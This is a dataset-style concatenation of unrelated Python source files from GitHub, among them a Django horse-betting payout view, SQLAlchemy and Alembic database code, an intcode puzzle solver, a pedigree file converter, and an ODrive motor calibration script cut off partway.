pts\n\t\t\t\t\t\tda.save()\n\t\t\t\t\telif da.id_cab == caballo_segundo: ##El segundo lugar.\n\t\t\t\t\t\tda.monto == 2 ##Le asigno 2 pts\n\t\t\t\t\t\tda.save()\n\t\t\t\t\telif da.id_cab == caballo_tercero: ##El tercer lugar\n\t\t\t\t\t\tda.monto == 1 ##Le asigno 1 pt\n\t\t\t\t\t\tda.save()\n\t\t\t\t\telse:\n\t\t\t\t\t\tda.monto == 0 ##No tuvo puntos\n\t\t\t\t\t\tda.save()\n\n\t\t###################################################################################\n\t\t\n\t\t##Lista la repartición individual. Ahora vamos a comenzar con las reparticiones de la última carrera de la jornada\n\t\t##(de la apuesta multicarrera)\n\t\t\n\t\tif instance == ultima_carrera: ##Si estamos en la última carrera de la jornada...\n\t\t\tjornada.estatus = 'f' ##Registro la jornada como finalizada\n\t\t\tjornada.save() ##Guardo en la BD\n\t\t\tfor ap5 in apostadores_ap5y6: ##Recorro los apostadores. (5y6)\n\t\t\t\tdetalles_apuesta = DetalleApuesta.objects.filter(id_ap_id=ap5.id) ##Extraigo los detalleapuesta.\n\t\t\t\tcount = 0 ##Debo contar la cantidad de veces que lo logró pegar la apuesta.\n\t\t\t\tfor da in detalles_apuesta: ##Itero.\n\t\t\t\t\tif da.posicion == 100: ##En efecto la pegó.\n\t\t\t\t\t\tcount+=1 ##Incremento el conteo\n\t\t\t\t##Ahora, verificamos si en efecto ganó.\n\t\t\t\tif count==5: ##Si logró acertar 5, ¡ganó!\n\t\t\t\t\tRegistrarApuestaGanada(User.objects.get(id=ap5.usuario_id),ap5,mult=0.75)\n\t\t\t\telif count==6: ##Acertó las 6, ganó premio completo.\n\t\t\t\t\tRegistrarApuestaGanada(User.objects.get(id=ap5.usuario_id),ap5)\n\t\t\t\telse:\n\t\t\t\t\tRegistrarApuestaPerdida(ap5)\n\t\t\t##Para el reparto de premios de PollaMax, debemos calcular primero el pote y cuánto le corresponde a cada uno.\n\t\t\tpote = 0 #Inicializo\n\t\t\tfor ap in apostadores_pollamax:\n\t\t\t\tpote += ap.monto ##Incremento en el monto\n\n\t\t\t##Ahora que está listo el pote, procedemos a contar cuántas personas ganaron. Ganan cuando la puntuación es mayor a 30.\n\t\t\tpote = pote * 0.75 #Este es el pote final (75% de lo ingresado)\n\t\t\tganadores = 0 #Cuántas personas ganaron\n\n\t\t\tfor ap in apostadores_pollamax: #Vamos a contar cuántas personas ganaron\n\t\t\t\tdetalles_apuesta = DetalleApuesta.objects.filter(id_ap_id=ap.id) ##Extraigo los detalleapuesta.\n\t\t\t\tcount = 0 ##Debo contar la puntuación que obtuvo\n\t\t\t\tfor da in detalles_apuesta: ##Itero.\n\t\t\t\t\tcount += da.monto\n\t\t\t\tif count > 30: #Si obtuvo más de 30 puntos, el usuario ganó\n\t\t\t\t\tganadores += 1 ##Cuento\n\t\t\tmonto = pote / ganadores ##El monto verdadero a pagarle a cada uno\n\t\t\t##Ahora tengo la cantidad final. Procedo a repartir (finalmente)\n\t\t\tfor ap in apostadores_pollamax: #Vamos a ver quiénes ganaron\n\t\t\t\tdetalles_apuesta = DetalleApuesta.objects.filter(id_ap_id=ap.id) ##Extraigo los detalleapuesta.\n\t\t\t\tcount = 0 ##Debo contar la puntuación que obtuvo\n\t\t\t\tfor da in detalles_apuesta: ##Itero.\n\t\t\t\t\tcount += da.monto\n\t\t\t\tif count > 30: #Si obtuvo más de 30 puntos, el usuario ganó\n\t\t\t\t\tRegistrarApuestaGanada(User.objects.get(id=ap.usuario_id),ap,monto=monto)\n\t\t\t\telse:\n\t\t\t\t\tRegistrarApuestaPerdida(ap)\n\t\t##Fin del algoritmo.\n\t\treturn super().form_valid(form)\n\n","repo_name":"ajav06/FlyHorse","sub_path":"apps/jornada/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":23502,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73470084995","text":"'''\nModule for database tables\n'''\n\n__author__ = 'Elisha Yadgaran'\n\n\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String, Numeric, DateTime, func, BigInteger\nfrom sqlalchemy_mixins import AllFeaturesMixin\n\n\nBase = declarative_base()\n\n\nclass BaseModel(Base, AllFeaturesMixin):\n __abstract__ = True\n created_timestamp = Column(DateTime(timezone=True), nullable=False, server_default=func.now())\n modified_timestamp = Column(DateTime(timezone=True), nullable=True, server_onupdate=func.now())\n id = Column(BigInteger, primary_key=True)\n\n\nclass Feedback(BaseModel):\n __tablename__ = 'requests'\n\n feedback = Column(String(1200), nullable=False)\n\n\nclass ModelHistory(BaseModel):\n __tablename__ = 'model_history'\n\n filename = Column(String())\n prediction_probability = Column(Numeric)\n prediction = Column(Integer)\n user_label = Column(Integer)\n label = Column(Integer)\n\n\nclass UserLabel(BaseModel):\n __tablename__ = 'user_labels'\n\n user_label = Column(String(12), nullable=False)\n\n\nclass SquirrelDescription(BaseModel):\n __tablename__ = \"squirrel_descriptions\"\n\n filename = Column(String(), unique=True)\n description = Column(String())\n","repo_name":"eyadgaran/squirrel-not-squirrel","sub_path":"squirrel/database/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"37764569959","text":"from django.shortcuts import render\n\n# Create your views here.\n\nfrom rest_framework import viewsets, permissions\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\n\nfrom utils.mixins import RunMixin\nfrom .models import Interfaces\nfrom . import serializers\nfrom testcases.models import Testcases\n\nfrom configures.models import Configures\n\n\nclass InterfacesViewSet(RunMixin, viewsets.ModelViewSet):\n \"\"\"\n create:\n 创建接口数据\n\n list:\n 获取接口列表数据\n\n retrieve:\n 获取接口详情数据\n\n update:\n 更新接口信息\n\n delete:\n 删除接口信息\n\n testcases:\n 获取接口测试用例\n\n configures:\n 获取接口配置信息\n\n \"\"\"\n queryset = Interfaces.objects.all()\n serializer_class = serializers.InterfacesModelSerializer\n permission_classes = [permissions.IsAuthenticated]\n\n def list(self, request, *args, **kwargs):\n \"\"\"\n 重写list方法,增加返回testcases和configures数据\n testcases:为接口的测试用例信息\n configures:为接口的配置信息\n :param request:\n :param args:\n :param kwargs:\n :return:\n \"\"\"\n response = super().list(request, *args, **kwargs)\n for item in response.data['results']:\n item['testcases'] = Testcases.objects.filter(interface_id=item.get('id')).count()\n item['configures'] = Configures.objects.filter(interface_id=item.get('id')).count()\n return response\n\n @action(detail=True)\n def testcases(self, request, *args, **kwargs):\n \"\"\"\n 获取接口的测试用例信息\n :param request:\n :param args:\n :param kwargs:\n :return:\n \"\"\"\n response = super().retrieve(request, *args, **kwargs)\n response.data = response.data.get('testcases_set')\n return response\n\n @action(detail=True)\n def configures(self, request, *args, **kwargs):\n \"\"\"\n 获取接口的配置信息\n :param request:\n :param args:\n :param kwargs:\n :return:\n \"\"\"\n response = super().retrieve(request, *args, **kwargs)\n response.data = response.data.get('configures')\n return response\n\n def get_testcase_qs(self):\n \"\"\"\n 获取测试用例集\n :return: 测试用例集,类型为QuerySet\n \"\"\"\n instance = self.get_object()\n qs = Testcases.objects.filter(interface=instance)\n return qs\n\n def get_serializer_class(self):\n \"\"\"\n 重写父类方法,根据不同action调用不同的序列化器类\n :return:\n \"\"\"\n if self.action == 'testcases':\n return serializers.TestcasesInterfacesModelSerializer\n elif self.action == 'configures':\n return serializers.ConfiguresInterfacesModelSerializer\n elif self.action == 'run':\n return serializers.InterfacesRunModelSerializer\n else:\n return super().get_serializer_class()\n","repo_name":"hzauliyanda/django_test","sub_path":"apps/interfaces/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4285682755","text":"import logging\nfrom collections import defaultdict\n\nimport numpy as np\n\nlogging.basicConfig(\n level=logging.DEBUG,\n handlers=[logging.StreamHandler(), logging.FileHandler(\"log.log\")],\n)\n\nlog = logging.getLogger(__name__)\n\n\nfrom day05 import (\n add,\n equals,\n input_,\n jump_if_false,\n jump_if_true,\n less_than,\n mult,\n parse_opcode,\n parse_parameters,\n)\nfrom day09 import adjust_base\n\n\ndef output_(tape, register):\n\n output, _, _ = parse_parameters(tape, register)\n # instruction_pointer = register[\"instruction_pointer\"]\n # output = tape[instruction_pointer + 1]\n # output = output if register[\"parameter1_mode\"] else tape[output]\n register[\"output\"].append(output)\n register[\"instruction_pointer\"] += 2\n # log.debug(\"Output: %s\", output)\n return tape, register\n\n\noperation = {\n 1: add,\n 2: mult,\n 3: input_,\n 4: output_,\n 5: jump_if_true,\n 6: jump_if_false,\n 7: less_than,\n 8: equals,\n 9: adjust_base,\n}\n\n\ndef process_tape(tape, input_list):\n register = dict(\n instruction_pointer=0,\n opcode=0,\n parameter1_mode=0,\n parameter2_mode=0,\n parameter3_mode=0,\n input_list=input_list,\n input=input_list[0],\n output=[],\n relative_base=0,\n )\n while True:\n\n parse_opcode(tape[register[\"instruction_pointer\"]], register)\n opcode = register[\"opcode\"]\n # log.debug(\"Current Output: %s\", register[\"output\"])\n # log.debug(\"Current OpCode: %s\", register[\"opcode\"])\n if opcode == 99:\n return tape, register\n else:\n tape, register = operation[opcode](tape, register)\n\n\ndef part2(tape):\n tape[0] = 2\n inp = 2\n while True:\n t, r = process_tape(tape, [inp])\n output_array = np.array(r[\"output\"], dtype=np.int).reshape(-1, 3)\n\n picture = np.zeros((101, 101), dtype=np.int)\n for sequence in output_array:\n x, y, symbol = sequence\n if x == -1 and y == 0:\n current_score = symbol\n continue\n picture[x][y] = symbol\n log.debug(\"Current score: %s\", current_score)\n paddle, _ = np.where(picture == 3)\n ball, _ = np.where(picture == 4)\n paddle = paddle[0]\n ball = ball[0]\n\n if ball < paddle:\n inp = -1\n elif ball > paddle:\n inp = 1\n else:\n inp = 0\n\n\nif __name__ == \"__main__\":\n\n with open(\"day13_input.txt\") as f:\n original_list = [int(x) for x in f.readline().split(\",\")]\n\n # convert tape from list to default dict\n original_tape = defaultdict(int)\n for k, v in enumerate(original_list):\n original_tape[k] = v\n\n tape = original_tape.copy()\n t, r = process_tape(tape, [1])\n output_array = np.array(r[\"output\"], dtype=np.int).reshape(-1, 3)\n\n picture = np.zeros((50, 50), dtype=np.int)\n for sequence in output_array:\n x, y, symbol = sequence\n picture[x][y] = symbol\n\n log.info(\"Part1 solution: %s\", np.sum(picture == 2)) # 341\n tape = original_tape.copy()\n log.info(\"Part2 solution: %s\", part2(tape)) #\n","repo_name":"kbaikov/adventofcode2019","sub_path":"day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21225877056","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\ndef findnum(lst:list,sum:int):\n \"\"\"\n\n 给定一个整型列表,请实现从其中找出2个数的和为某一个指定的值\n 如:lst =[1,5,2,7,4,9],指定的目标值为11,可以从中找出 2和9之和为11 \n \"\"\"\n\n for i in range(len(lst)):\n for j in range(i+1,len(lst)):\n if lst[i] + lst[j] == sum:\n print('列表{}中{}与{}的和为{}'.format(lst,lst[i],lst[j],sum))\n\n\n\nfindnum([1,5,2,7,4,9],11)\n","repo_name":"magedus/python-11","sub_path":"chenguowen/week8/findnum.py","file_name":"findnum.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"zh","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"5435348277","text":"def selectionSort(arr):\n size = len(arr)\n for i in range(0, size):\n minIndex = i\n for j in range(i+1, size):\n if arr[j] < arr[minIndex]: \n minIndex = j\n arr[i], arr[minIndex] = arr[minIndex], arr[i]\n return arr\na = [12,32,52,10,22,3,5,13,7,9,4]\nprint(selectionSort(a))","repo_name":"varnitmittal/quarantine-coding-revision","sub_path":"Algo/Sorting/selectionsort.py","file_name":"selectionsort.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35634154454","text":"#!/usr/bin/env python3\n\n\"\"\"\nConvert a PLINK format pedigree \"fam\" file into a \"def\" file for input into\nPed-sim.\n\nThe input file can be tab or space separated and should have the following\ncolumns in this order:\n\nFAM_ID INDIV_ID FATHER_ID MOTHER_ID SEX PHENO\n\nThe IDs can be either integers or strings, and the sex should be 1 for male, 2\nfor female.\n\nAuthor: Sara Mathieson\nDate: 05/08/20\n\"\"\"\n\nfrom collections import defaultdict\nimport optparse\nimport sys\n\n################################################################################\n# CLASSES\n################################################################################\n\nclass Generation:\n \"\"\"Keeps track of the ordered branches in a generation\"\"\"\n\n def __init__(self):\n self.branches = []\n\n def __str__(self):\n return \", \".join(self.branches)\n\n def add_branch(self, bid):\n \"\"\"Add a branch with the given individual's ID\"\"\"\n assert bid not in self.branches\n self.branches.append(bid)\n\n def find_branch(self, pid):\n \"\"\"Given parent ID, find the branch index of the parent\"\"\"\n lst = []\n for i, bid in enumerate(self.branches):\n if pid == bid:\n lst.append(i)\n\n # make sure parent appears in at most one branch\n assert len(lst) <= 1\n if len(lst) == 1:\n return lst[0]\n return None\n\nclass Individual:\n \"\"\"Keeps track information about each individual in the pedigree\"\"\"\n\n def __init__(self, fid, iid, father, mother, sex, pheno):\n self.fid = fid\n self.iid = iid\n self.spouses = set()\n self.father = father\n self.mother = mother\n self.sex = sex\n self.pheno = pheno\n self.children = []\n self.founder = False\n\n def add_spouse(self, sid):\n \"\"\"Add a spouse (note the type is a set)\"\"\"\n self.spouses.add(sid)\n\n def add_child(self, cid):\n \"\"\"Add a child\"\"\"\n assert cid not in self.children\n self.children.append(cid)\n\n################################################################################\n# PARSE ARGS and INPUT FILE\n################################################################################\n\ndef parse_args():\n \"\"\"Parse command line arguments.\"\"\"\n parser = optparse.OptionParser(description='fam to def file for Ped-sim')\n\n parser.add_option('-i', '--fam_filename', type='string', \\\n help='path to input fam file')\n parser.add_option('-o', '--def_filename', type='string', \\\n help='path to output def file')\n\n (opts, args) = parser.parse_args()\n\n mandatories = ['fam_filename', 'def_filename',]\n for m in mandatories:\n if not opts.__dict__[m]:\n print('mandatory option ' + m + ' is missing\\n')\n parser.print_help()\n sys.exit()\n\n return opts\n\ndef read_indvs(filename):\n \"\"\"Parse input fam file to create Individuals\"\"\"\n # 2d dictionary:\n # key1=FAM_ID (string), val=second dictionary\n # key2=ID (string), val=Individual\n all_indvs = {}\n\n # read file\n f = open(filename,'r')\n for line in f:\n tokens = line.strip().split()\n indv = Individual(tokens[0], tokens[1], tokens[2], tokens[3], tokens[4],\n tokens[5])\n if tokens[0] not in all_indvs:\n all_indvs[ tokens[0] ] = {}\n all_indvs[ tokens[0] ][ tokens[1] ] = indv\n f.close()\n\n # process all the individuals to add spouses and children\n for fid in all_indvs:\n num_indvs = 0\n num_founder = 0\n for iid, indv in all_indvs[fid].items():\n num_indvs += 1\n fatherid = indv.father\n motherid = indv.mother\n\n # check parent sexes\n if fatherid != '0':\n assert all_indvs[fid][fatherid].sex == \"1\", \\\n \"Fathers must be male; see family \" + fid + \" indiv \" + fatherid\n if motherid != '0':\n assert all_indvs[fid][motherid].sex == \"2\", \\\n \"Mothers must be female; see family \" + fid + \" indiv \" + motherid\n\n\n # non-founder individual\n if fatherid != '0' and motherid != '0':\n all_indvs[fid][fatherid].add_spouse(motherid)\n all_indvs[fid][motherid].add_spouse(fatherid)\n all_indvs[fid][fatherid].add_child(iid)\n all_indvs[fid][motherid].add_child(iid)\n else:\n indv.founder = True\n num_founder += 1\n print(\"fam file, '\" + fid + \"' num individuals:\", num_indvs)\n print(\"fam file, '\" + fid + \"' num founders:\", num_founder)\n\n return all_indvs\n\n################################################################################\n# CREATE GENERATIONS\n################################################################################\n\ndef fam_generations(fam_indvs, fid):\n \"\"\"From dictionary of all individuals, iteratively create generations\"\"\"\n fam_gens = []\n used_ids = set() # keep track of which individuals we've processed\n\n # set up first generation with founders\n prev_gen = Generation()\n for iid, indv in fam_indvs.items():\n if indv.founder:\n\n # one spouse\n if len(indv.spouses) == 1:\n sid = list(indv.spouses)[0]\n if fam_indvs[sid].founder:\n if indv.sex == \"1\":\n assert iid not in used_ids and sid not in used_ids\n prev_gen.add_branch(iid)\n used_ids.add(iid)\n used_ids.add(sid)\n\n # multiple spouses\n else:\n assert iid not in used_ids\n prev_gen.add_branch(iid)\n used_ids.add(iid)\n\n # continue creating generations while we still have active branches\n while len(prev_gen.branches) > 0:\n fam_gens.append(prev_gen)\n next_gen = Generation()\n\n # find all the children of all parents in the previous generation\n for bid in prev_gen.branches:\n parent = fam_indvs[bid]\n\n for cid in parent.children:\n child = fam_indvs[cid]\n fatherid = child.father\n motherid = child.mother\n father = fam_indvs[fatherid]\n mother = fam_indvs[motherid]\n\n # neither parent is founder\n if not father.founder and not mother.founder:\n # make sure parents are NOT in *current* generation\n if fatherid in used_ids and \\\n motherid in used_ids and \\\n fatherid not in next_gen.branches and \\\n motherid not in next_gen.branches:\n\n # add a branch for this child\n if cid not in used_ids:\n next_gen.add_branch(cid)\n used_ids.add(cid)\n\n # WAIT to add until generation after one of the parents\n else:\n pass\n\n # one parent is founder\n else:\n # pass over married-in with multiple spouses\n if parent.founder and len(parent.spouses) > 1:\n pass\n else:\n if fatherid == parent.iid:\n assert mother.founder\n if motherid not in used_ids:\n used_ids.add(motherid)\n else:\n assert father.founder\n if fatherid not in used_ids:\n used_ids.add(fatherid)\n\n # add a branch for this child\n if cid not in used_ids:\n next_gen.add_branch(cid)\n used_ids.add(cid)\n\n # set up for the next generation\n prev_gen = next_gen\n\n print(\"def file, '\" + fid + \"' num individuals:\", len(used_ids))\n\n # look at number of individuals in branches\n in_branches = []\n for gen in fam_gens:\n in_branches.extend(gen.branches)\n in_branches = set(in_branches)\n\n # founders are counted in branches in gen 0\n num_founders = len(fam_indvs) - len(in_branches) + len(fam_gens[0].branches)\n return fam_gens\n\ndef find_gen_branch(iid, g, fam_gens):\n \"\"\"\n Based on the ID of an individual and the current generation, search through\n previous generations for the branch index.\n \"\"\"\n\n for prev_gen in range(g-1, -1, -1):\n b = fam_gens[prev_gen].find_branch(iid) # indexed from zero\n if b != None:\n return prev_gen, b # return as soon as we find it\n\n return None, None\n\ndef pretty_print(s_dict, fam_indvs):\n \"\"\"From a dictionary of children for each couple, create the \"def\" format\"\"\"\n s = \" \"\n founder_ids = []\n\n # go through each couple\n for k, v in s_dict.items():\n\n branches = []\n string = None\n # all children should have same parents here\n for item in v:\n branches.append(item[0])\n if string == None:\n string = item[1]\n else:\n assert item[1] == string\n\n fatherid = k.split('+')[0]\n motherid = k.split('+')[1]\n if fam_indvs[fatherid].founder:\n if fatherid not in founder_ids:\n founder_ids.append(fatherid)\n if fam_indvs[motherid].founder:\n if motherid not in founder_ids:\n founder_ids.append(motherid)\n\n # one or both spouses is a founder (this is just sanity checking)\n if \"_\" not in string:\n assert fam_indvs[fatherid].founder or fam_indvs[motherid].founder\n # check for married-in with multiple spouses\n elif fam_indvs[fatherid].founder or fam_indvs[motherid].founder:\n #print(fatherid, motherid, 'married-in with multiple spouses')\n pass\n\n # sort children in each branch\n branches.sort()\n\n # one child\n if len(branches) == 1:\n s += str(branches[0]) + \":\" + string + \" \"\n # children are consecutive\n elif branches[-1] - branches[0] + 1 == len(branches):\n s += str(branches[0]) + \"-\" + str(branches[-1]) + \":\" + string + \" \"\n # children are not consecutive\n else:\n s += \",\".join([str(branches[i]) for i in range(len(branches))]) + \\\n \":\" + string + \" \"\n\n return s, founder_ids\n\n################################################################################\n# MAIN\n################################################################################\n\ndef main():\n \"\"\"Orchestrate generation creation and writing of output file\"\"\"\n opts = parse_args()\n all_indvs = read_indvs(opts.fam_filename)\n\n print()\n\n # set up def file\n def_file = open(opts.def_filename,'w')\n\n # process the families one by one\n for fid in all_indvs:\n fam_gens = fam_generations(all_indvs[fid], fid)\n founder_ids = []\n\n def_file.write(\"def \" + fid + \" 1 \" + str(len(fam_gens)) + \"\\n\")\n\n # write each generation in def format\n for g in range(len(fam_gens)):\n gen = fam_gens[g]\n\n # keeps track of children with the same two parents\n s_dict = defaultdict(list)\n if g != 0:\n\n # go through all the branches to find parents in the prev\n # generation\n for b, bid in enumerate(gen.branches):\n assert not all_indvs[fid][bid].founder\n\n # IDs of father and mother\n fatherid = all_indvs[fid][bid].father\n motherid = all_indvs[fid][bid].mother\n\n # NOTE: if founder, omit spouse to create new founder spouse\n # NOTE: one parent must be from the previous generation\n # find (generation, branch_index) of indv\n fg, fb = find_gen_branch(fatherid, g, fam_gens)\n mg, mb = find_gen_branch(motherid, g, fam_gens)\n\n # CASE 1: founder father\n if fg == None:\n assert mg == g-1 # mother in prev generation\n assert all_indvs[fid][fatherid].founder\n add_str = str(mb+1) # just include branch index\n\n # CASE 2: founder mother\n elif mg == None:\n assert fg == g-1 # father in prev generation\n assert all_indvs[fid][motherid].founder\n add_str = str(fb+1) # just include branch index\n\n # CASE 3: both father and mother in prev generation\n elif fg == g-1 and mg == g-1:\n add_str = str(fb+1) + \"_\" + str(mb+1)\n\n # CASE 4: father in prev generation\n elif fg == g-1:\n add_str = str(fb+1) + \"_\" + str(mb+1) + \"^\" + str(mg+1)\n\n # CASE 5: mother in prev generation\n elif mg == g-1:\n add_str = str(mb+1) + \"_\" + str(fb+1) + \"^\" + str(fg+1)\n\n # should not get here!\n else:\n print(\"ERROR: no valid parents for indv\", bid)\n\n # add this indv to correct parents\n parent_str = fatherid+\"+\"+motherid\n s_dict[parent_str].append([b+1, add_str])\n\n # convert to def format\n s, f_ids_gen = pretty_print(s_dict, all_indvs[fid])\n\n # keep track of founder IDs for debugging\n founder_ids.extend(f_ids_gen)\n\n # write to def\n def_file.write(str(g+1) + \" 1 \" + str(len(gen.branches)) + s + \"\\n\")\n\n founder_ids = set(founder_ids)\n print(\"def file, '\" + fid + \"' num founder:\", len(founder_ids))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"williamslab/ped-sim","sub_path":"fam2def.py","file_name":"fam2def.py","file_ext":"py","file_size_in_byte":14022,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"61"} +{"seq_id":"72516791235","text":"#!/usr/bin/python3\n\"\"\" Module - 2-export_to_JSON\"\"\"\n\nif __name__ == \"__main__\":\n import json\n import requests\n from sys import argv\n\n r = requests.get(\"https://jsonplaceholder.typicode.com/todos\",\n params={\"userId\": int(argv[1])})\n list_dict = r.json()\n\n r = requests.get(\"https://jsonplaceholder.typicode.com/users\",\n params={\"id\": int(argv[1])})\n username = r.json()[0].get(\"username\")\n\n for dict in list_dict:\n dict[\"task\"] = dict.pop(\"title\")\n dict[\"username\"] = username\n dict.pop(\"userId\")\n dict.pop(\"id\")\n\n json_dict = {argv[1]: list_dict}\n\n with open('{}.json'.format(argv[1]), 'w', encoding=\"UTF-8\") as jsonfile:\n str_json = json.dumps(json_dict)\n jsonfile.write(str_json)\n","repo_name":"DiegoOrejuela/holberton-system_engineering-devops","sub_path":"0x15-api/2-export_to_JSON.py","file_name":"2-export_to_JSON.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27494217149","text":"import logging\nimport tempfile\n\nfrom .common import *\nfrom .deps.image_build import *\nfrom .deps.restframework import *\nfrom .mods.cors import *\nfrom .mods.oidc import *\n\nlogging.disable(logging.CRITICAL)\n\nDEBUG = True\n\nORG_NAME = \"OrgTestSuite\"\nDEFAULT_DOMAIN = \"http://testserver\"\nALLOWED_HOSTS = [\"testserver\"]\n\nASSET_BUFFER_DIR = tempfile.mkdtemp() # overridden in individual tests\nSUBTUPLE_DIR = os.path.join(MEDIA_ROOT, \"subtuple\")\nSUBTUPLE_TMP_DIR = os.path.join(SUBTUPLE_DIR, \"tmp\")\n\nORCHESTRATOR_HOST = \"orchestrator\"\nORCHESTRATOR_PORT = 9000\nORCHESTRATOR_TLS_ENABLED = False\nORCHESTRATOR_MTLS_ENABLED = False\nORCHESTRATOR_RETRY_DELAY = 0\nORCHESTRATOR_GRPC_KEEPALIVE_TIME_MS = 60000\nORCHESTRATOR_GRPC_KEEPALIVE_TIMEOUT_MS = 20000\nORCHESTRATOR_GRPC_KEEPALIVE_PERMIT_WITHOUT_CALLS = False\nORCHESTRATOR_GRPC_KEEPALIVE_MAX_PINGS_WITHOUT_DATA = 0\n\nLEDGER_MSP_ID = \"testOrgMSP\"\nLEDGER_CHANNELS = {\"mychannel\": {\"chaincode\": {\"name\": \"mycc\"}}}\n","repo_name":"Substra/substra-backend","sub_path":"backend/backend/settings/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"61"} +{"seq_id":"71766545155","text":"\"\"\"add camera options\n\nRevision ID: ca91c47e7274\nRevises: 0187ea22dc4b\nCreate Date: 2021-12-19 15:15:48.525102\n\n\"\"\"\nimport os\nimport sys\n\nsys.path.append(os.path.abspath(os.path.join(__file__, \"../../../..\")))\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ca91c47e7274'\ndown_revision = '0187ea22dc4b'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n with op.batch_alter_table(\"camera\") as batch_op:\n batch_op.add_column(sa.Column('show_preview', sa.Boolean))\n\n op.execute(\n '''\n UPDATE camera\n SET show_preview=0\n '''\n )\n\n\ndef downgrade():\n with op.batch_alter_table(\"camera\") as batch_op:\n batch_op.drop_column('show_preview')\n","repo_name":"kizniche/Mycodo","sub_path":"alembic_db/alembic/versions/ca91c47e7274_add_camera_options.py","file_name":"ca91c47e7274_add_camera_options.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":2708,"dataset":"github-code","pt":"61"} +{"seq_id":"36432460373","text":"import pandas as pd\nimport collections\n\n\n\nclass MessageManager(object):\n\n def __init__(self, self_idx, num_agents):\n self.messages = {}\n for agent_idx in range(1,num_agents+1):\n if self_idx == agent_idx:\n continue\n self.messages[agent_idx] = []\n self.self_id = self_idx\n\n def add_messages(self, game_diff):\n print(game_diff)\n game_diff_msgs = game_diff[\"text\"]\n for idx, agent in enumerate(game_diff[\"agent\"]):\n if idx+1 == self.self_id:\n continue\n self.messages[agent].append(game_diff_msgs[idx])\n print(game_diff_msgs[idx])\n\n def update_base_info(self, base_info):\n pass\n\n def create_message(self):\n message = collections.namedtuple(\"subject\", \"target\", \"COMINGOUT\", \"ESTIMATE\", \"Agree\", \"Disagree\",\"Action\",\n \"Past Result\", \"Reqiest\", \"Because\", \"Inquire\", \"Logic Op\", \"Skip\")\n return message","repo_name":"LiorMoshe/Werewolf-Anac19","sub_path":"messages_manager.py","file_name":"messages_manager.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8764040357","text":"\"\"\"\nMotor configuration and calibration script. Run as follows:\n\n python scripts/config_motors.py\n\nbut copy-pasting the code into a REPL is better if you're still\nfiguring parameters out, and want to re-run this multiple times\nwithout rebooting/re-finding the device\n\nFor some parameters/numbers related to current etc, check out:\nhttps://www.harrisaerial.com/wp-content/uploads/2016/12/U10-Plus-80KV-Data.jpg\nfound via\nhttps://www.harrisaerial.com/product/t-motor-u10-plus-80kv-100kv-170kv/\n\"\"\"\nimport odrive\nfrom odrive.enums import (\n MOTOR_TYPE_HIGH_CURRENT,\n ENCODER_MODE_INCREMENTAL,\n AXIS_STATE_FULL_CALIBRATION_SEQUENCE,\n AXIS_STATE_IDLE,\n)\nfrom odrive.utils import dump_errors\nfrom fibre.protocol import ChannelBrokenException\n\ncpr = 4*500\n\n\ndef config_motor(ax: 'odrive.Axis'):\n # current limit in [A]\n ax.motor.config.current_lim = 15 # not sure!\n\n # how much the current can swing (I think)\n # change this if doing current control, and get\n # CURRENT_UNSTABLE_ERROR or something\n # ax.motor.config.current_lim_tolerance\n\n # velocity limit [counts/s]\n ax.controller.config.vel_limit = cpr*16 # not sure!\n\n # calibration current [A]\n # = continuous current when stationary\n ax.motor.config.calibration_current = 10 # not sure!\n\n # number of magnet poles in motor divided by two\n ax.motor.config.pole_pairs = 20\n\n # motor type\n ax.motor.config.motor_type = MOTOR_TYPE_HIGH_CURRENT\n\n # encoder count per revolution [CPR]\n # = 4x the pulse per revolution [PPR]\n ax.encoder.config.cpr = cpr\n ax.encoder.config.mode = ENCODER_MODE_INCREMENTAL\n ax.encoder.config.use_index = True\n\n # calibration accuracy. not sure about this one\n ax.encoder.config.calib_range = 0.05\n\n # run full calibration sequence\n import time\n ax.encoder.config.zero_count_on_find_idx = True\n ax.requested_state = AXIS_STATE_FULL_CALIBRATION_SEQUENCE\n while ax.current_state != AXIS_STATE_IDLE:\n time.sleep(0.1)\n\n # set startup sequence\n # see https://docs.odriverobotics.com/api/odrive.axis.axisstate\n # despite not using the encoder's index channel, turning\n # off encoder index search made the ODrive not recognize the\n # encoders. Not sure why!\n ax.config.startup_motor_calibration = False\n ax.config.startup_encoder_index_search = True # False\n ax.config.startup_encoder_offset_calibration = False\n ax.config.startup_closed_loop_control = False\n ax.config.startup_sensorless_control = False\n\n # save\n ax.requested_state = AXIS_STATE_IDLE\n ax.encoder.config.pre_calibrated = True\n ax.motor.config.pre_calibrated = True\n\n dump_errors(odrv0, True)\n\n\n# reboot first, to make sure we don't save other random settings on the device\nprint('finding and rebooting odrive...')\nodrv0 = odrive.find_any()\ntry:\n 